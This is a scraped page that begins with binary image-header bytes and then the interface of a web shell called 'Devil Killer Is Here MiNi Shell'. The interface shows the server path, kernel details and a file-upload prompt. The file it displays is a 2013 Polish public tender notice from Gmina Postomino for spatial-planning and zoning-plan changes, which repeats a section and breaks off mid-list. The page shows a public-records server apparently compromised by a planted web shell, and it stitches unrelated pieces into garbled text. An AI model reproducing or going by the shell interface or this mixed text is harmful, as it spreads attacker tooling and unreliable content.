JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131217/523518-N-2013.html

<p class="kh_header"><b>Postomino: Zmiana studium uwarunkowań i kierunków zagospodarowania Gminy Postomino oraz zmiana miejscowego planu zagospodarowania przestrzennego miejscowości Nacmierz i miejscowości Jarosławiec - część I, część I, część III</b><br>
<b>Numer ogłoszenia: 523518 - 2013; data zamieszczenia: 17.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Postomino , Postomino 30, 76-113 Postomino, woj. zachodniopomorskie, tel. 0-59 810 85 93, faks 0-59 810 85 84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.postomino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zmiana studium uwarunkowań i kierunków zagospodarowania Gminy Postomino oraz zmiana miejscowego planu zagospodarowania przestrzennego miejscowości Nacmierz i miejscowości Jarosławiec - część I, część I, część III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest sporządzenie zmiany studium uwarunkowań i kierunków zagospodarowania Gminy Postomino o powierzchni - 22.724,00 ha, zmiana miejscowego planu zagospodarowania przestrzennego m. Nacmierz o powierzchni ca. - 40,00 ha oraz zmiana miejscowego planu zagospodarowania przestrzennego m. Jarosławiec Słoneczna - Spacerowa o powierzchni - 2,20 ha.
2.Przedmiot zamówienia został podzielony na trzy części: 
część 1 - zmiana studium uwarunkowań i kierunków zagospodarowania Gminy Postomino o powierzchni - 22.724,00 ha
część 2 - zmiana miejscowego planu zagospodarowania przestrzennego m. Nacmierz o powierzchni ca. - 40,00 ha
część 3 - zmiana miejscowego planu zagospodarowania przestrzennego m. Jarosławiec Słoneczna - Spacerowa o powierzchni - 2,20 ha.
3.Przedmiot zamówienia obejmuje w szczególności:
1)sporządzenie projektów zmian zgodnie z ustawą o planowaniu i zagospodarowaniu przestrzennym z dnia 27 marca 2003 roku (tj Dz. U. 2012.647 z późn. zm), wraz z aktami wykonawczymi do ww. ustawy;
2)przeprowadzenie pełnej procedury formalno-prawnej wynikającej z ustawy 
o planowaniu i zagospodarowaniu przestrzennym z uwzględnieniem wymogów określonych w ustawie z dnia 27 kwietnia  2001 r. Prawo ochrony środowiska (tj. Dz. U. 2013.1232) oraz ustawie z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. Nr 2013.1235).
4.Przedmiot zamówienia obejmuje wykonanie usługi w IV etapach (dotyczy poszczególnych części zamówienia):
1)Etap I - analizy i studia, w tym:
a)zebranie, analiza i sprawdzenie materiałów wyjściowych, analiza stanu istniejącego,
b)analiza obszaru wskazanego do sporządzenia zmiany określonych w części 1, 2 i 3 oraz innymi opracowaniami dla danego obszaru,
c)analiza uwarunkowań wynikających z zapisów planów dotychczas obowiązujących;
d)analiza złożonych uwag i wniosków do zmiany odpowiednio dla poszczególnych części z przygotowaniem projektu rozstrzygnięcia Wójta o sposobie ich uwzględnienia;
e)analiza uwarunkowań ekofizjograficznych - opracowanie dotyczące obszaru określonego w części 1, 2 i 3 wykonane zgodnie z rozporządzeniem Ministra Środowiska z dnia 9 września 2002 roku w sprawie opracowań ekofizjografcznych (Dz. U. z 2002r. nr 155 poz.1298) - opracowanie w 2 egz.;
f)prognoza oddziaływania na środowisko;
g)prognoza skutków finansowych uchwalenia zmiany planu;  
h)wykonanie planszy inwentaryzacyjnej w skali 1:10000 (dla części 1);
i)wykonanie koncepcji programowo- przestrzennej w skali 1:10000 (dla części1);
j)dla części 2 i 3 w skali 1:1000.
2)Etap II - projekt zmiany - czynności w zakresie sporządzenia projektu studium, planów
a)plansza podstawowa w skali 1:10000 (dla części 1) dla części 2 i 3 w skali 1:1000 zawierająca elementy zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z  2003r. nr 164 poz. 1587);
b)opracowanie tekstu zmiany w formie uchwały zgodnie z ustawą o planowaniu 
i zagospodarowaniu przestrzennym;
c)wykonanie prognozy oddziaływania na środowisko ustaleń zmian zgodnie ze stosownym uzgodnieniem zakresu i stopnia szczegółowości informacji wymaganych w prognozie; 
d)przedłożenie projektu zmian wraz z prognozą do akceptacji Wójtowi Gminy;
e)przedłożenie do zaopiniowania projektu zmiany komisji urbanistyczno architektonicznej;
f)przygotowanie projektu zmiany do ustawowego opiniowania i uzgadniania - w ilości wynikającej z rozdzielnika.
3)Etap III - uchwalanie zmiany- czynności w zakresie procedury uchwalenia studium 
i planów:
a)uzyskanie i analiza wszelkich wymaganych uzgodnień i opinii;
b)wprowadzenie zmian do projektu zmiany wynikających z uzyskanych uzgodnień 
i opinii;
c)przygotowanie kompletu materiałów do wyłożenia projektu zmiany do publicznego wglądu;
d)prezentacja projektu zmiany w czasie dyskusji publicznej oraz obecność na wyłożeniu projektu zmiany do publicznego wglądu w Urzędzie Gminy;
e)analiza uwag wniesionych do wyłożonego do publicznego wglądu projektu zmiany;
f)przygotowanie projektu zmiany ze zmianami wynikającymi z uwzględnionych uwag wniesionych w okresie wyłożenia projektu zmiany do publicznego wglądu oraz sporządzenie listy nieuwzględnionych uwag wraz z uzasadnieniem;
g)przygotowanie projektu uchwał do uchwalenia wraz z uzasadnieniem;
h)wprowadzenie zmian do projektów wynikających z uwzględnienia przez Radę Gminy wniesionych uwag;
i)powtórzenie wymaganych czynności w zakresie dokonanych zmian.
4)Etap IV - Przekazanie materiałów:Wykonawca przekaże Zamawiającemu komplet materiałów w następujących ilościach:
A. dla części 1:
a)rysunek zmiany studium kolorowy w skali 1:10000 - 1 egz. + wersja elektroniczna; 
b)rysunek czarno - biały w skali 1:10000 - 2 egz. +wersja elektroniczna;
c)rysunek pomniejszony kolorowy w skali 1:25000 - 4 egz. + wersja elektroniczna;
d)ustalenia tekstowe zmiany studium w formie tradycyjnej - 2 egz. + wersja elektroniczna;
e)uchwałę wraz z załącznikami zapisaną w wersji elektronicznej (XML);
f)dokumentację formalno - prawną dotyczącą uchwalenia zmiany studium 
i przeprowadzenia strategicznej oceny oddziaływania na środowisko - 1 egz.;
g)prognozę oddziaływania na środowisko - 2 egz. + wersja elektroniczna;
h)opracowanie ekofizjograficzne - 2 egz. + wersja elektroniczna. 
B. dla części 2 i 3:
a) rysunek zmiany planu kolorowy w skali 1:1000 - 1 egz. + wersja elektroniczna; 
b) rysunek czarno - biały w skali 1:1000 - 2 egz. +wersja elektroniczna;
c) rysunek pomniejszony kolorowy w skali 1:2000 - 4 egz. + wersja elektroniczna;
d) ustalenia tekstowe zmiany planów w formie tradycyjnej - 2 egz. + wersja elektroniczna;
e) uchwałę wraz z załącznikami zapisaną w wersji elektronicznej (XML);
f) dokumentację formalno - prawną dotyczącą uchwalenia zmian planów i przeprowadzenia strategicznej   oceny oddziaływania na środowisko - 1 egz.;
g) prognozę oddziaływania na środowisko - 2 egz. + wersja elektroniczna;
h) prognozę skutków finansowych uchwalenia zmiany planu - 1 egz. + wersja elektroniczna;
i) opracowanie ekofizjograficzne - 2 egz. + wersja elektroniczna. 
Materiały zostaną przyjęte protokołem zdawczo -odbiorczym.
4.Wykonawca w ramach niniejszego zamówienia zobowiązany jest do:
a)uzgodnienia projektów uchwał z Wójtem Gminy Postomino;
b)przedstawienia w/w opracowań na sesji Rady Gminy Postomino;
c)przygotowania projektów pism wraz z rozdzielnikiem dot. zawiadomień, uzgodnień oraz projektów odpowiedzi na korespondencję dotyczącą przedmiotu zamówienia;
d)skompletowania dokumentacji formalno-prawnej dotyczącej procedury uchwalenia zmiany studium, planów;
e)skompletowania dokumentacji formalno - prawnej dotyczącej przeprowadzenia strategicznej oceny oddziaływania na środowisko sporządzonych dokumentów.
5.Wykonawca w ramach niniejszego zamówienia uwzględni koszty wykonania przedmiotu zamówienia w tym koszt wykonania materiałów studialnych, opracowania ekofizjografii, prognozy oddziaływania na środowisko, oraz koszty wynikające z procedury uchwalania zmiany studium. Koszt przesyłek pocztowych w zakresie zawiadomień, uzgadniania 
i opiniowania oraz ogłoszeń prasowych pokrywa Zamawiający. Podkład mapowy dostarcza Zamawiający.
6.Prawa autorskie.
1)Z mocy umowy zawartej w niniejszym postępowaniu Wykonawca wraz z projektantami (twórcami) przeniesie na rzecz Zamawiającego własność wszelkich praw autorskich do  opracowania stanowiącego utwory w rozumieniu przepisów ustawy z dnia 04.02.1994 r. o prawie autorskim i prawach pokrewnych (tj. Dz. U. Nr 90 poz. 631 
z późn. zm.),
2)Przeniesienie własności autorskich praw majątkowych do opracowania stanowiącego przedmiot umowy następuje bezwarunkowo na czas nieokreślony w ramach wynagrodzenia za wykonanie zamówienia,
3)Wykonawca podpisując umowę zawartą w wyniku niniejszego postępowania oświadcza, że prawo do przeniesienia własności autorskich praw majątkowych we wskazanym wyżej zakresie posiada i że nie  podlega ono żadnym ograniczeniom 
i obciążeniom.
7.W przypadku stwierdzenia, że usługa wykonywana jest niezgodnie z obowiązującymi przepisami Zamawiający może odmówić zapłaty i żądać ich ponownego wykonania lub odstąpić od umowy z winy Wykonawcy z naliczeniem kary umownej.
8.Zaleca się Wykonawcom przeprowadzenie szczegółowej wizji lokalnej w terenie celem uzyskania wszystkich informacji koniecznych do przygotowania oferty i zawarcia umowy. Każdy z Wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia.
9.Szczegółowe warunki realizacji przedmiotu zamówienia określone są w projekcie umowy w dziale III SIWZ. 
10.Kod Wspólnego Słownika Zamówień CPV: 71410000-5 Usługi planowania przestrzennego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże się:
a)dotyczy CZĘŚCI I zamówienia - wykonaniem, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, nowego lub dokonaniem zmian w istniejącym co najmniej 1 studium uwarunkowań i kierunków zagospodarowania przestrzennego,
b)dotyczy CZĘŚCI II zamówienia - wykonaniem, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 miejscowych  planów  lub zmiany planów zagospodarowania przestrzennego dotyczących obszarów wiejskich o powierzchni co najmniej 20 ha każdy, 
c)dotyczy CZĘŚCI III zamówienia - wykonaniem, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 miejscowych  planów  lub zmiany planów zagospodarowania przestrzennego dotyczących obszarów wiejskich 
o powierzchni co najmniej 2 ha każdy,
oraz załączy dowody potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże (dotyczy I, II i III CZĘŚCI zamówienia) co najmniej jedną osobę pełniącą funkcję głównego projektanta posiadającą uprawnienia urbanistyczne.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Przez usługi, których dotyczy obowiązek wskazania w wykazie, Zamawiający rozumie:
dotyczy CZĘŚCI I zamówienia - wykonanie nowego lub dokonanie zmian 
w istniejącym co najmniej 1 studium uwarunkowań i kierunków zagospodarowania przestrzennego,
dotyczy CZĘŚCI II zamówienia - wykonanie co najmniej 2 miejscowych  planów  lub zmiany planów zagospodarowania przestrzennego dotyczących obszarów wiejskich o powierzchni co najmniej 20 ha każdy, 
dotyczy CZĘŚCI III zamówienia - wykonaniem co najmniej 2 miejscowych  planów  lub zmiany planów zagospodarowania przestrzennego dotyczących obszarów wiejskich o powierzchni co najmniej 2 ha każdy.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy w następującym zakresie: 
1)wynagrodzenia Wykonawcy, na skutek zmiany przepisów prawnych, m.in. zmiany stawki od podatku od towarów i usług mającej zastosowanie do przedmiotu umowy, 
2)w zakresie zmiany terminu wykonania tj. zmiany poszczególnych etapów realizacji zamówienia oraz zmiany końcowego terminu realizacji zamówienia w przypadku: 
a)opóźnienia w uzyskaniu uzgodnień od stosownych organów określonych w ustawie o planowaniu i zagospodarowaniu przestrzennym, 
b)zmian dokumentacji wynikającej z inicjatywy Zamawiającego lub okoliczności, które uniemożliwiają należyte wykonanie przedmiotu umowy,
c)zawieszenia prac przez zamawiającego,
3)zmian obligatoryjnych wynikających ze zmian przepisów prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.postomino.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Postomino, Postomino 30, 76-113 Postomino, pok. nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2014 godzina 10:00, miejsce: Urząd Gminy Postomino, Postomino 30, 76-113 Postomino, pok. nr 19 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zmiana studium uwarunkowań i kierunków zagospodarowania Gminy Postomino.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest sporządzenie zmiany studium uwarunkowań i kierunków zagospodarowania Gminy Postomino o powierzchni - 22.724,00 ha, zmiana miejscowego planu zagospodarowania przestrzennego m. Nacmierz o powierzchni ca. - 40,00 ha oraz zmiana miejscowego planu zagospodarowania przestrzennego m. Jarosławiec Słoneczna - Spacerowa o powierzchni - 2,20 ha.
2.Przedmiot zamówienia został podzielony na trzy części: 
część 1 - zmiana studium uwarunkowań i kierunków zagospodarowania Gminy Postomino o powierzchni - 22.724,00 ha
część 2 - zmiana miejscowego planu zagospodarowania przestrzennego m. Nacmierz o powierzchni ca. - 40,00 ha
część 3 - zmiana miejscowego planu zagospodarowania przestrzennego m. Jarosławiec Słoneczna - Spacerowa o powierzchni - 2,20 ha.
3.Przedmiot zamówienia obejmuje w szczególności:
1)sporządzenie projektów zmian zgodnie z ustawą o planowaniu i zagospodarowaniu przestrzennym z dnia 27 marca 2003 roku (tj Dz. U. 2012.647 z późn. zm), wraz z aktami wykonawczymi do ww. ustawy;
2)przeprowadzenie pełnej procedury formalno-prawnej wynikającej z ustawy 
o planowaniu i zagospodarowaniu przestrzennym z uwzględnieniem wymogów określonych w ustawie z dnia 27 kwietnia  2001 r. Prawo ochrony środowiska (tj. Dz. U. 2013.1232) oraz ustawie z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. Nr 2013.1235).
4.Przedmiot zamówienia obejmuje wykonanie usługi w IV etapach (dotyczy poszczególnych części zamówienia):
1)Etap I - analizy i studia, w tym:
a)zebranie, analiza i sprawdzenie materiałów wyjściowych, analiza stanu istniejącego,
b)analiza obszaru wskazanego do sporządzenia zmiany określonych w części 1, 2 i 3 oraz innymi opracowaniami dla danego obszaru,
c)analiza uwarunkowań wynikających z zapisów planów dotychczas obowiązujących;
d)analiza złożonych uwag i wniosków do zmiany odpowiednio dla poszczególnych części z przygotowaniem projektu rozstrzygnięcia Wójta o sposobie ich uwzględnienia;
e)analiza uwarunkowań ekofizjograficznych - opracowanie dotyczące obszaru określonego w części 1, 2 i 3 wykonane zgodnie z rozporządzeniem Ministra Środowiska z dnia 9 września 2002 roku w sprawie opracowań ekofizjografcznych (Dz. U. z 2002r. nr 155 poz.1298) - opracowanie w 2 egz.;
f)prognoza oddziaływania na środowisko;
g)prognoza skutków finansowych uchwalenia zmiany planu;  
h)wykonanie planszy inwentaryzacyjnej w skali 1:10000 (dla części 1);
i)wykonanie koncepcji programowo- przestrzennej w skali 1:10000 (dla części1);
j)dla części 2 i 3 w skali 1:1000.
2)Etap II - projekt zmiany - czynności w zakresie sporządzenia projektu studium, planów
a)plansza podstawowa w skali 1:10000 (dla części 1) dla części 2 i 3 w skali 1:1000 zawierająca elementy zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z  2003r. nr 164 poz. 1587);
b)opracowanie tekstu zmiany w formie uchwały zgodnie z ustawą o planowaniu 
i zagospodarowaniu przestrzennym;
c)wykonanie prognozy oddziaływania na środowisko ustaleń zmian zgodnie ze stosownym uzgodnieniem zakresu i stopnia szczegółowości informacji wymaganych w prognozie; 
d)przedłożenie projektu zmian wraz z prognozą do akceptacji Wójtowi Gminy;
e)przedłożenie do zaopiniowania projektu zmiany komisji urbanistyczno architektonicznej;
f)przygotowanie projektu zmiany do ustawowego opiniowania i uzgadniania - w ilości wynikającej z rozdzielnika.
3)Etap III - uchwalanie zmiany- czynności w zakresie procedury uchwalenia studium i planów:
a)uzyskanie i analiza wszelkich wymaganych uzgodnień i opinii;
b)wprowadzenie zmian do projektu zmiany wynikających z uzyskanych uzgodnień 
i opinii;
c)przygotowanie kompletu materiałów do wyłożenia projektu zmiany do publicznego wglądu;
